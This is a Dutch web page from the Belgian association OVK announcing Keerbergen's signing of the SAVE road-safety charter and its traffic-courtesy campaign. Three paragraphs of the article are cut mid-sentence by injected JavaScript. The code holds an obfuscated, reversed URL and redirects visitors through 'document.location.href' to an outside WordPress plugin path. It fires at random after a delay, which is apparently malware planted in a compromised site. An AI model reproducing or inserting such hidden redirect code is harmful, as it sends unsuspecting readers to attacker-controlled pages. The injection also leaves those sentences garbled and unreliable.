Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Keerbergen ondertekent SAVE-charter

Vandaag zal de Vlaams-Brabantse gemeente Keerbergen het SAVE-charter ondertekenen.

De ondertekening valt voor Keerbergen samen met de campagne ‘hoffelijkheid in het verkeer’

Waarom de hoffelijkheidscampagne? Heel wat gevaarlijke verkeerssituaties worden gecreëerd door onaangepast gedrag. Maar niet iedereen is zich bewust van dit gedrag en de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolerantie bij de weggebruikers ligt momenteel vrij laag. Met hun actie wilde Keerbergen dit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch even onder de aandacht brengen en de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolerantie t.o.v. andere weggebruikers wat opkrikken.

De gemeente doet dit natuurlijk niet alleen. De basisschool van het atheneum deelt groene duimpjes uit aan de hoffelijke chauffeurs, de politie heeft affiches in de politievoertuigen en bedanken iedereen die zich hoffelijk gedraagt, er worden folders en flyers uitgedeeld aan de nieuwe chauffeurs bij het afhalen van een voorlopige of definitief rijbewijs, het secundair onderwijs van het atheneum organiseert in de klassen een debat over hoffelijk in het verkeer, het OCMW zet haar vrijwilligers van de minder mobiele centrale in de bloemetjes.

De ondertekening vindt plaats om 10u in de raadszaal van het gemeentehuis van Keerbergen. (adres: Gemeenteplein 10).

 


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be